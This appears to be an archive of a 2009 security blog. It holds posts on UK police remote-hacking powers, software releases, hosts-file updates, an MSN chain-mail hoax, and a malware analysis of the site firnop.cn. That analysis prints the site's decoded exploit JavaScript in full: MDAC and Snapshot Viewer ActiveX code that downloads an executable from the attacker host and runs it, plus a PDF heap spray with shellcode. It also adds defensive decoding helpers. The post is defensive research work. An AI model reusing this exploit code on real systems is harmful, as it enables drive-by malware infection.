Hacking – known as "remote searching" – has been quietly adopted by police across Britain following the development of technology to access computers' contents at a distance. Police say it is vital for tracking cyber-criminals and paedophiles and is used sparingly but civil liberties groups fear it is about to be vastly expanded.


Okay, a few problems here. Firstly, "hacking" is not known as "remote searching"; it is known as gaining unauthorised entry to a system via an exploit or vulnerability (a real hacker doesn't need a trojan pre-planted on the system to access your PC). If that were the case, any VNC/remote desktop software could be classed as "hacking" - something it quite clearly is not - and searching Google could be classed as "remote searching" since you are searching a remote system - something it most definitely is not (a little extreme there I know, but their article is vague at best). For a more accurate description of hacking and hackers, see the following;

http://www.schneier.com/blog/archives/2006/09/what_is_a_hacke.html
http://www.ed.uiuc.edu/wp/crime/hacking.htm

Computer hacking has to be approved by a chief constable, who must be satisfied the action is proportionate to the crime being investigated.


Here lies one of the biggest problems. If the crime being investigated warrants hacking into someone's computer, then why does it not warrant getting an err - warrant to LEGALLY search their computer? I am 100% sure that this is going to be abused by the police to plant "evidence" for those they can't get any other way. That's how they do it now, why change? Especially when they are performance based.

A spokesman for the Association of Chief Police Officers, said police carried out 194 hacking operations in 2007-08 in England, Wales and Northern Ireland, including 133 in private homes, 37 in offices and 24 in hotel rooms.

The spokesman said such surveillance was regulated under the Regulation of Investigatory Powers Act.

"The police service in the United Kingdom will aggressively pursue serious and organised criminality, including where that takes the modern forms of hi-tech crime," he added.


Correct me if I am wrong but, wasn't RIPA meant for preventing terrorism? How exactly does that translate into allowing them to hack into all and sundry's computers whenever they feel like it?

The first Britons will receive biometric identity cards at the end of the year, paving the way to the world's largest identity register. Genetic details of more than four million people are on the DNA national database, the highest proportion of any Western country.


You'll not be getting me to allow you to get my damn DNA or any form of "biometric identity card". They can't even keep their own employees' data safe, so how can they keep this safe?

Regardless of the above, if this is true, then we've got serious problems (not that we didn't already) in that the Police now have far too much power - power they most definitely should not have. Unfortunately however, without verification one way or the other, that's all this is - pure speculation. All I do know is that I already do not trust the UK police force, and this is just one more reason not to trust them - they have been proven to be corrupt before, many times.

Read the full article at:

New powers for police to hack your PC
http://www.independent.co.uk/news/uk/home-news/new-powers-for-police-to-hack-your-pc-1225802.html

Kudos to David Harley (Eset) for the heads up;

Magic Lantern Show in the UK?
http://www.eset.com/threat-center/blog/?p=392

Wednesday 7 January 2009

firnop.cn - MDAC + PDF + Snapshot viewer control exploits

I was asked to look at firnop.cn (IP: 195.24.78.242, PTR: B088.com) by Connie yesterday, due to its containing some rather suspicious code. I was not to be disappointed.

As I told Connie, this one only allows access once per IP, after that, you get a lovely little 404. I thought this was only going to be a once per day job, but alas no, this is the second day and I still can't access the original code there now. Fear not, your clever blogger saved a copy of the original vURL result;

vURL Online - Results for firnop.cn
http://hosts-file.net/misc/firnop_cn/vURL_Online_-_firnop_cn.html

This shows some rather obscure code hidden once again in a form field, this time rosorur, which is then loaded dynamically courtesy of document.getElementById('rosorur').value. To decode this, we'll need two things;

1. Malzilla (malzilla.sourceforge.net)

Malzilla is my favourite tool for decoding obfuscated or encoded scripts, and has been since its inception. If you're not using it already, and are working with malicious sites, give it a try.

2. Small change to the original code

The small change we need to make is to ditch the HTML, and move the content of the rosorur text box to its own variable. Once we've done this, we can simply change;

eval(document.getElementById('rosorur').value)

To;

eval(rosorur)

If we now run this through Malzilla, we're given the following results. The CLSID used in the code is for the MSXML 4.0 component.

<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<SCRIPT type='text/javascript'>
function errfuck()
{
  return true;
}
window.onerror=errfuck;
function dddec(str)
{
  cto="GsHkUqw1S2Kba0QPivRDnAyr9lJYm4TcF6IXo3Mx7BENtjCZpuf5gW8zVhLdeO";
  cfrom="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890";
  res="";
  for (i=0;i<str.length;i++)
  {
   c=str.charAt(i);
   pos=cto.indexOf(c);
   if (pos!=-1)
   res+=cfrom.charAt(pos);
   else
   res+=c;
  }
  return res;
}
function goMDAC()
{
  d8= 0;
  var Qy29Nd = document.createElement(dddec("SriHAU"));
  Qy29Nd.setAttribute("id",dddec("JqWefa"));
  Qy29Nd.setAttribute("classid",dddec("ARb1a:uMehZVVh-hVo8-ggMO-ed8o-OOZOzxZWem8h"));
  try
  {
   var LoWMFJ = Qy29Nd.CreateObject(dddec("KaSar.bUkHKl"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  try
  {
   var PEELt6 = Qy29Nd.CreateObject(dddec("3PHRR.o22R1AKU1S9"),'');
   var d8 = 1;
  }
  catch(e)
  {
  }
  if(d8 == 1)
  {
   try
   {
    var JB7Ebp = Qy29Nd.CreateObject(dddec("lbnlRW.C5tBTTX"),'');
    JB7Ebp.open("GET","http://firnop.cn/getexe.php?h=11",false);
    JB7Ebp.send();
    LoWMFJ.type = 1;
    LoWMFJ.open();
    LoWMFJ.Write(JB7Ebp.responseBody);
    Frogxa = "..\\S87ekhV.exe";
    LoWMFJ.SaveToFile(Frogxa,2);
    eval(dddec("XmmtUh.3PHRRmnHAwUH(xkSQnK);"));
    //return 1;
   }
   catch(e)
   {
   }
  }
}
function goPDF()
{
  wnd=window;
  while (wnd.parent!=wnd)
  wnd=wnd.parent;
  wnd.location="getfile.php?f=vispdf";
}
function goSnap()
{
  var sfrom = 'http://firnop.cn/getexe.php?h=12';
  var fuckavo="SB";
  var x;
  var fuckavp="SB";
  var obj;
  var fuckavx="SB";
  var mycars = new Array();
  var fuckava="SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
  if(objlcx)
  {
   setTimeout('window.location = "ldap://"',3000);
   for (x in mycars)
   {
    obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")
    var buf1 = sfrom;
    var fuckavg="SB";
    var buf2=mycars[x];
    var fuckavj="SB";
    obj.Zoom = 0;
    obj.ShowNavigationButtons = false;
    obj.AllowContextMenu = false;
    obj.SnapshotPath = buf1;
    try
    {
     obj.CompressedPath = buf2;
     obj.PrintSnapshot();
    }
    catch(e)
    {
    }
   }
  }
  var fuckavqgga="SB";
  var fuckavqggxa="SBd";
}
setTimeout('goMDAC();',3500);
setTimeout('goSnap();',1);
try
{
  var obj = null;
  obj = new ActiveXObject("AcroPDF.PDF");
  if (!obj)
  {
   obj = new ActiveXObject("PDF.PdfCtrl");
  }
  if (obj)
  {
   document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
   setTimeout('goPDF();',5000);
  }
}
catch(e)
{
  document.write("<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();',5000);
}
</script>
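What Malzilla is doing in the dddec() step can be reproduced by hand, which is useful when you want to see every hidden string at once rather than stepping through them one at a time. The following is an added example for this post, not code from the original page or from the firnop.cn script: it copies the two substitution alphabets from the decoded script above, builds the reverse table, and pulls every dddec("...") argument out of a constructed excerpt containing the calls seen in goMDAC(). The decoded values (the RDS.Dataspace CLSID, adodb.stream, Shell.Application, msxml2.XMLHTTP and the final ShellExecute call) are exactly what a defender needs to recognise this MDAC download-and-execute pattern in other samples.

```javascript
// Added example (not from the page or the firnop.cn script): a small static
// analysis helper that reverses the dddec() substitution used by the script
// above and reports every string it hides. The two alphabets are copied from
// the decoded script; SAMPLE is a constructed excerpt containing only the
// dddec("...") calls that appear in goMDAC() on the page.
const CTO = "GsHkUqw1S2Kba0QPivRDnAyr9lJYm4TcF6IXo3Mx7BENtjCZpuf5gW8zVhLdeO";
const CFROM = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890";

// Build the substitution table once instead of calling indexOf per character.
const TABLE = new Map([...CTO].map((c, i) => [c, CFROM[i]]));

// Same mapping as the script's dddec(): characters outside the alphabet
// (':', '-', '.', '(' and so on) pass through unchanged.
function dddecode(str) {
  return [...str].map((c) => TABLE.get(c) ?? c).join("");
}

// Pull every dddec("...") argument out of a script body and decode it.
function decodeHiddenStrings(script) {
  const re = /dddec\("([^"]*)"\)/g;
  const out = [];
  for (const m of script.matchAll(re)) {
    out.push({ encoded: m[1], decoded: dddecode(m[1]) });
  }
  return out;
}

// Constructed excerpt: the dddec() calls from the goMDAC() function above.
const SAMPLE = `
  var Qy29Nd = document.createElement(dddec("SriHAU"));
  Qy29Nd.setAttribute("id",dddec("JqWefa"));
  Qy29Nd.setAttribute("classid",dddec("ARb1a:uMehZVVh-hVo8-ggMO-ed8o-OOZOzxZWem8h"));
  var LoWMFJ = Qy29Nd.CreateObject(dddec("KaSar.bUkHKl"),'');
  var PEELt6 = Qy29Nd.CreateObject(dddec("3PHRR.o22R1AKU1S9"),'');
  var JB7Ebp = Qy29Nd.CreateObject(dddec("lbnlRW.C5tBTTX"),'');
  eval(dddec("XmmtUh.3PHRRmnHAwUH(xkSQnK);"));
`;

for (const { encoded, decoded } of decodeHiddenStrings(SAMPLE)) {
  console.log(`${encoded}  ->  ${decoded}`);
}
```

Note that the decoded id ("Qy29Nd") and the decoded eval() body ("PEELt6.ShellExecute(Frogxa);") are the same identifiers the script uses in clear text, so the obfuscation only hides the ProgIDs and CLSID from simple string scanners; a substitution table this small is a good candidate for a detection signature in its own right.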


Unfortunately, the only ones I could actually download were f=pdf and f=vispdf, so let's analyze those shall we? First of all, we need to uncompress them. For this we'll use pdftk.

Once the Javascript is dumped, we see a Base64 encoded string that is decoded courtesy of the following;

function func(str) {
  b64s="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  while(str.substr(-1,1)=="=")str=str.substr(0,str.length-1);
  var b=str.split(""), i
  var s=Array(), t
  var lPos = b.length - b.length % 4
  for(i=0;i<lPos;i+=4){
    t=(b64s.indexOf(b[i])<<18)+(b64s.indexOf(b[i+1])<<12)+(b64s.indexOf(b[i+2])>>6)+b64s.indexOf(b[i+3])
    s.push( ((t>>16)&0xff), ((t>>8)&0xff), (t&0xff) )
  }
  if( (b.length-lPos) == 2 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12); s.push( ((t>>16)&0xff)); }
  if( (b.length-lPos) == 3 ){ t=(b64s.indexOf(b[lPos])<<18)+(b64s.indexOf(b[lPos+1])<<12)+(b64s.indexOf(b[lPos+2])<<6); s.push( ((t>>16)&0xff), ((t>>8)&0xff) ); }
  for( i=s.length-1; i>=0; i-- ){
    if( s[i]>=168 ) s[i]=AZ.charAt(s[i]-163)
    else s[i]=String.fromCharCode(s[i])
  };
  eval(s.join(""))
}


If we then have Malzilla decode this, we're given yet another encoded script, which this time needs to be handled a little differently;

vikekide2=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949%u5149%u565a%u5854%u3336%u5630%u3458%u3041%u3642%u4848%u4230%u3033%u4342%u5856%u4232%u4244%u3448%u3241%u4441%u4130%u5444%u4442%u4251%u4130%u4144%u5856%u5a34%u4238%u4a44%u4d4f%u4e4b%u5142%u554c%u544c%u3343%u4c49%u4648%u4b49%u334e%u5041%u4842%u5346%u304c%u4949%u4e44%u4f4c%u4e4b%u5045%u4e4a%u4e4b%u4f4f%u4f4f%u4f4f%u5742%u544e%u4949%u5949%u5949%u4c43%u4f4d%u334a%u4a49%u5949%u4949%u5949%u3144%u4d49%u3945%u4144%u4e49%u4845%u4346%u3144%u4d49%u3941%u3144%u5441%u3144%u4e4c%u4a45%u4144%u4e4d%u3847%u4e41%u394c%u564c%u3144%u4e47%u4b49%u594c%u5644%u5144%u4d47%u584d%u4a4c%u4746%u4c4f%u4c50%u4c4a%u5144%u4a48%u494c%u3644%u4144%u564b%u4f43%u3947%u4c42%u464c%u334f%u4e4d%u3941%u4c42%u4c48%u414c%u3550%u394d%u4d4e%u374b%u3742%u4c42%u4c48%u4c47%u5144%u5546%u3144%u4d4f%u4b4d%u594c%u554c%u544a%u574a%u594c%u354a%u4a4c%u4542%u4f4f%u4144%u4941%u3144%u4d4f%u5845%u494c%u454c%u554a%u474a%u394b%u494c%u354a%u3144%u5949%u394c%u554c%u3144%u3643%u5144%u4650%u514c%u454f%u4947%u4144%u3449%u4f43%u494d%u4c42%u3741%u4c49%u5949%u4949%u5949%u314c%u354f%u3946%u4c4b%u4c4f%u5648%u4c50%u4645%u4c43%u5144%u4441%u4f43%u394a%u4c42%u3741%u4a46%u3949%u4949%u3949%u514c%u454f%u484c%u4c4f%u4d4f%u3149%u4a47%u3149%u4e4e%u3643%u4149%u4a4f%u5149%u4c47%u514c%u5745%u4b49%u3144%u4445%u4f43%u4b49%u4c4c%u5648%u4c50%u3745%u3550%u394d%u494c%u4c45%u4f4a%u4b47%u4f4e%u5550%u4d4d%u394c%u494d%u4e41%u4f4e%u4949%u5949%u4a4c%u5549%u4c49%u4c49%u4c4c%u4c4f%u4c49%u5648%u4c50%u4645%u3144%u5445%u4c49%u4c4c%u3648%u4c50%u5649%u4c49%u3648%u4c50%u364d%u4a4c%u3549%u3345%u514e%u3549%u4e4e%u5642%u4c4a%u4c4b%u4c4f%u4c4c%u5648%u344b%u4c43%u4c42%u3344%u474b%u5747%u4a4c%u5549%u554c%u5741%u4b4f%u3648%u5648%u5648%u4d50%u4f4e%u4e4d%u4c49%u4e4b%u4f48%u4f4c%u4d4a%u4f4d%u4f4d%u4e4b%u4f4e%u4e4c%u4e4c%u3949%u4d50%u4f4e%u4e4d%u4c4c%u4e42%u4e4c%u4e4d%u4f4e%u4f46%u4d4d%u4f42%u4e4b%u4f4e%u4f4c%u4e4d%u4f48%u4e4b%u4e42%u4d4a%u3949%u4c50%u4f42%u4f47%u4d4e%u4e41%u4f4e%u4f4c%u5949%u4d4e%u4e41%u4f42%u4e4d
%u4c4d%u4f41%u4e4b%u4f4e%u4f4a%u4f4d%u3949%u4d45%u4f48%u4f4a%u4f4d%u4d45%u4f42%u4f4b%u4e4b%u4f4a%u4e4b%u4e42%u4d4a%u4949%u4e4e%u4e4b%u4f45%u4f46%u4f48%u4f47%u5949%u4c4e%u4c4b%u4d45%u4d4d%u4f48%u4e50%u4f47%u4f45%u4f48%u4f4a%u4f4d%u4c4d%u4f48%u4d4f%u4f42%u4f45%u4f4e%u4d4a%u3949%u364a%u3746%u5746%u5742%u434c%u524f%u324f%u4648%u5649%u3744%u3650%u364f%u3742%u3250%u4643%u4650%u324f%u5647%u4645%u3746%u3645%u574a%u5645%u4250%u5742%u564a%u5742%u434f%u564a%u534d%u5343%u3341%u4842%u005a");var robedimup=unescape("%u0A0A%u0A0A");var tupari=20;var tosib=tupari+vikekide2.length;while(robedimup.length<tosib)robedimup+=robedimup;var vamuniveso=robedimup.substring(0,tosib);var sevusupo=robedimup.substring(0,robedimup.length-tosib);while(sevusupo.length+tosib<0x60000)sevusupo=sevusupo+sevusupo+vamuniveso;var bibale=new Array();for(lepefela6=0;lepefela6<1200;lepefela6++){bibale[lepefela6]=sevusupo+vikekide2}var rufirubed5=1299999999999999999988888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888;util.printf("%45000f",rufirubed5);


If we try having Malzilla actually decode this, Malzilla will freeze and crash (the script builds 1200 copies of a block of at least 0x60000 characters, so there is a lot to evaluate), so instead we'll have it convert the string to hex, then save that. This gives us a new .bin file containing a hex dump. Loading this in Malzilla and using its Shellcode Analyzer shows:
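The "convert the string to hex" step is simple enough to do without Malzilla, and doing it by hand makes the byte order explicit: each %uXXXX escape is one UTF-16 code unit that unescape() stores low byte first, so "%u03eb" becomes the bytes EB 03. The following is an added example for this post (not the page's or Malzilla's code) that turns a %u-escaped string into raw bytes and prints a conventional hex dump, using a constructed sample made of the first few escapes of the vikekide2 string above.

```javascript
// Added example (not from the page): reproduce Malzilla's "convert to hex"
// step for a %u-escaped string so the bytes can be saved to a .bin file and
// examined. SAMPLE is a constructed excerpt: the first escapes of the
// vikekide2 string shown above, plus the %u0A0A filler used for the spray.
function unicodeEscapesToBytes(escaped) {
  // unescape() accepts both %uXXXX (one UTF-16 unit) and %XX (one byte).
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g;
  const bytes = [];
  let consumed = 0;
  for (const m of escaped.matchAll(re)) {
    if (m.index !== consumed) {
      throw new Error(`unexpected text at offset ${consumed}`);
    }
    if (m[1] !== undefined) {
      const unit = parseInt(m[1], 16);
      bytes.push(unit & 0xff, unit >> 8); // little-endian: low byte first
    } else {
      bytes.push(parseInt(m[2], 16));
    }
    consumed = m.index + m[0].length;
  }
  if (consumed !== escaped.length) {
    throw new Error(`trailing text at offset ${consumed}`);
  }
  return Uint8Array.from(bytes);
}

// Format bytes as "offset  xx xx xx ..." lines, 16 bytes per line.
function hexDump(bytes, width = 16) {
  const lines = [];
  for (let off = 0; off < bytes.length; off += width) {
    const chunk = Array.from(bytes.subarray(off, off + width));
    const hex = chunk.map((b) => b.toString(16).padStart(2, "0")).join(" ");
    lines.push(`${off.toString(16).padStart(8, "0")}  ${hex}`);
  }
  return lines.join("\n");
}

// Constructed sample: opening escapes of vikekide2 from the page.
const SAMPLE = "%u03eb%ueb59%ue805%ufff8%uffff%u494f%u4949%u4949";
// Constructed sample: the filler string the spray is built from.
const FILLER = "%u0A0A%u0A0A";

console.log(hexDump(unicodeEscapesToBytes(SAMPLE)));
console.log(hexDump(unicodeEscapesToBytes(FILLER)));
```

Two things fall out of the dump that are worth noting as a defender: the shellcode opens with the familiar "jmp short / pop / call" prologue (EB 03 59 EB 05 E8 F8 FF FF FF) that precedes a self-decoding, alphanumeric-looking payload, and the filler resolves to the byte 0A repeated, which is why the script needs such a large number of copies (the 0x0A0A0A0A value doubles as both padding and the address the spray is aimed at). Both are good reasons to treat an unusually large unescape() string in a PDF as hostile even before the shellcode is analysed.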



This shows us the executable coming from;

firnop.cn/getexe.php?h=32

MD5: E27BB8F8ADEB613305F5DE9A68C125DB

HTTP/1.1 200 OK
Date: Thu, 08 Jan 2009 10:16:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Length: 85504
Content-Disposition: attachment; filename=update.exe
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/octet-stream


Detection sadly, is rubbish;

http://www.virustotal.com/analisis/1fac7fccd549f08c83373ab686062b0c

Sandbox report will be added once it's finished (tried Anubis but for some reason, it failed with an "XML could not be found" error)

/edit 12-01-2009

Sadly, the sandboxes still haven't gotten back to me (submitted to Anubis and MS's sandboxes). However, I've just noticed on Honeyblog's feed that CWSandbox has this one (or at least a variant of it, as its network activity shows firnop.cn), so that'll have to do;

https://cwsandbox.org/?page=report&analysisid=879663&password=vqtgp

Tuesday 6 January 2009

Keryx: Update your Linux system without an internet connection!

Though in most North American cities one cannot find a spot without at least a weak WiFi signal, many of us Linux geeks still live in rural areas with less Internet connectivity. Also, in various non-Westernized nations, there is a growing number of Linux users who may have a computer at home, but cannot afford a decent connection. For both groups, software updates typically demand an Internet connection, which can make updating difficult if not impossible. There is now a solution though, a new program called Keryx.

Keryx was written by Southern Illinois University computer science student Chris Oliver, who wanted a way to download software and updates for Ubuntu systems that had little or no connectivity. Simply put Keryx on your pen drive, use it to create a new project file which retains a copy of your software sources and other system details, then take the pen drive to a computer with a better connection. Via its Synaptic-like interface, users can then select all updates for download, plus select any other software they may want to install, complete with dependency resolution.

Read the full article/tutorial by Douglass Clem over at;

http://crashsystems.net/2009/01/keryx-tutorial/

Homepage:
http://keryx.betaserver.org/

Courtesy Earthling Series #6 @ CoU
http://www.calendarofupdates.com/updates/index.php?showtopic=17001&pid=73830

Orca Browser 1.1 RC2 Released!

Why choose Orca Browser?

Orca Browser is an extremely fast and user friendly web browser, designed to add more functions on to the latest version of Firefox. Not only does Orca Browser contain all the features, such as security, low memory usage, spell-checker, built-in download manager, etc. from a typical Gecko based browser, it also improves the speed, adds built-in features like an AD Blocker, Flash Blocker, Online Profile Storage, auto Form-Filler, and an Outlook-style RSS Reader. The auto Form-Filler helps to memorize or fill different types of web forms and passwords. It can also protect them with a master security password. Online Profile Storage allows users to create their own account. With their username and password, users can choose to save or access their personal data such as bookmarks, AutoFills, and RSS feeds remotely from any computer.

Changes in this release:

  * Fixed the DDE bug that kept opening htm/html files in Avant Browser
  * Fixed the unresponsive tab switching bug
  * Fixed the bug stopping Orca Browser from tiling properly along with other application windows
  - Removed the feature to start up another application through pressing commands to start->run box
  * Fixed unworking navigation buttons bug in Flash
  * Fixed the bug where downloading files stopped if Orca Browser was closed
  * Fixed the bug stopping Orca Browser from reloading saved pages when restarting it after installing new Firefox addons
  * Fixed some translation issues
  * Fixed the bug where the URL drop down list screened up the address bar when the tab bar was set to the bottom
  * Fixed the bug that kept Orca Browser from signing in some websites
  * Fixed the bug that kept the side bar blank when history panel was set default
  * Fixed the miscoded keyword bug if searching a selected text through dragging and dropping
  * Fixed the miscoded hint bug if hovering the mouse over a bookmark item in Side Bar
  * Fixed the unabling to organize bookmarks bug when setting Orca Browser to use IE favorites
  * Fixed the F6 & (ALT + D) not working bug when the focus was already at Address Bar
  * Fixed the bug stopping Orca Browser from calling the default search engine through searching keywords from Address Bar
  * Fixed the bug stopping the Address Bar drop down list from matching the inputting keywords
  * Fixed the unsupporting Chinese username issue in AutoFill


Download:
http://dl.filekicker.com/send/file/166091-YKTW/osetup.exe
http://avant.it-mate.co.uk/dl/Orca_Browser/RC/1_1/osetup1_1_RC2.exe

References:

Avant goes Gecko
http://mysteryfcm.co.uk/?mode=News&date=14-09-2005

Dr Orca goes Beta
http://www.temerc.com/forums/viewtopic.php?f=22&t=1257

Sunday 4 January 2009

hpHOSTS - UPDATED January 5th, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 53,952 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 05/01/2009 05:26
  2. Last Verified: 05/01/2009 05:00

Download hpHosts now!
http://hosts-file.net/?s=Download

Sorry guys, you've been hoaxed, MSN is NOT closing down!

I received a forwarded e-mail earlier, and though I am well aware that people are still gullible enough to believe anything anyone tells them, I still find myself annoyed by those that send this rubbish. Especially when they're believing a scam that is now at least 8 YEARS OLD (as referenced by the 2001 BBC article the hoax points you to in order to verify what they are telling you).

This particular e-mail reads;

Hi, this is Tara and John, the directors of MSN,

Sorry for the interruption but MSN is closing down. This is because too many inconsiderate people are taking up all the names (e.g. Making up lots of different accounts for just one person, etc.), we only have 587 names left. If you would like to close your account, DO NOT SEND THIS MESSAGE ON. If you would like to keep your account, then SEND THIS MESSAGE TO EVERYONE ON YOUR CONTACT LIST.

This is no joke, we will be shutting down the servers.
Send it on, thanks.


P.S. WHOEVER DOES NOT SEND THIS MESSAGE, YOUR ACCOUNT WILL BE CLOSED AND IT WILL COST YOU 10.00 A MONTH TO USE. SEND THIS TO EVERYONE ON YOUR CONTACT LIST. NOW YOU KNOW WHAT TO DO. PLEASE DO NOT FORWARD THIS or REPLY. COPY THE WHOLE EMAIL. GO BACK TO YOUR INBOX AND CLICK ON NEW. AND PASTE THANKYOU FOR YOUR ATTENTION.


This is no joke if you don't believe us then go to this site: http://news.BBC.co.UK/1/hi/business/1189119.stm and see for yourself. Anyways once you've sent this message to at least 18 contacts, your MSN icon will become blue. Please copy and paste, don't forward because people won't read them


Elaine


Let's go through this bit by bit, shall we? First and foremost, even if the MSN directors were named "Tara and John", they would NOT be sending this kind of thing out themselves, and certainly not via e-mail. You'd see a press release or some kind of media publication DIRECTLY ON THE MICROSOFT WEBSITE, several MONTHS (if not a year or two) before it actually happened.

Secondly, MSN is NOT closing down and likely never will be (FYI, MSN = Hotmail = Live). It is also NOT running out of names for you to choose from - again, the likelihood of this happening is about the same as the likelihood of myself actually owning Microsoft.

Thirdly, even if this were the case, Microsoft would NOT ask you to send anything to anyone in order to keep your account. If MSN/Hotmail/Live truly was closing, it wouldn't matter what you did - you'd still lose your account.

Fourth, the e-mail references an article on the BBC website that it claims can confirm what they are telling you - it won't. What the article DOES tell you is that;

1. The article on the BBC website is from 2001, 8 YEARS AGO
2. The article told you that Microsoft were NOT going to charge MSN/Hotmail users for existing services;

"Microsoft stresses that the site's core facilities including Hotmail will remain free.

Fees will be demanded for extra services that are now under development, such as an advanced filter system to protect email accounts from junk mail"


This isn't the first time this particular e-mail (and various incarnations of such) has done the rounds either, Sophos have seen it before (2006), as have many other people.

I cannot stress enough, if someone sends you an e-mail claiming one thing or another, VERIFY WHAT THEY ARE TELLING YOU and NEVER "send it to everyone on your contact list" (or whatever the wording is that they decide to use). For further information;

Hoax Slayer
http://www.hoax-slayer.com

Snopes
http://snopes.com

Montana Menagerie - Hoaxes, Spam and Phishing scams. The countless ways miscreants try to scam their way into your wallet.
http://www.montanamenagerie.org/forum/viewforum.php?f=7

TeMerc Internet Countermeasures - Phishing and Spam
http://temerc.com/forums/viewforum.php?f=41

Saturday 3 January 2009

A call for volunteers, hpHosts needs YOU!

Since taking over hpHosts a couple of years ago, I've made several major changes, removed several hundred domains, and continue to add/update and remove several hundred more on an on-going basis (now with the help of 3 friends).

One of the more major changes I made, was to add classifications for all of the sites in the database, where time allowed. Unfortunately I've still not had time to classify all of them, and as it stands, there are currently 9,177 domains still requiring classification.

I'd very much like to request volunteers to go through those still requiring classification, and send me their classification suggestions. How do you do this you ask? Simple, sort of. All you need to do, is drop by the Browse Database section of the website, filter the list by classification by clicking [ Unclassified ] and research the sites listed.

Note, many of the sites WILL infect your computer if visited directly, so you'll need to either use a spare machine, or if you are familiar enough with code, view the sites code to see what it does. For hints on safely viewing a malicious website, please see;

TeMerc Malware Forensics Instructional Guide
http://temerc.com/forums/viewtopic.php?f=27&t=5703

The list of possible classifications is quite clear, and so it should be easy enough to determine if a site fits one of them (if it does, all I need to know is which one it fits and why) - if not, let me know and it'll usually be removed.

Friday 2 January 2009

Next hpHosts release

Just an update folks. I know the hpHosts release is a little late. The sites are currently onto the second round of validation (there's currently 1657 not resolving).

Short of a major catastrophe, the next release will be out on Monday January 5th.

As an aside, I found an issue with vURL Online earlier, concerning the two it-mate.co.uk servers. This issue has been fixed and you should now be able to dissect sites with these servers without issue.

I've also updated the hpHosts website to allow for changes and updates to the WhoIs servers, so there should be fewer problems obtaining WhoIs details (especially for domains with double TLDs such as .ac.uk)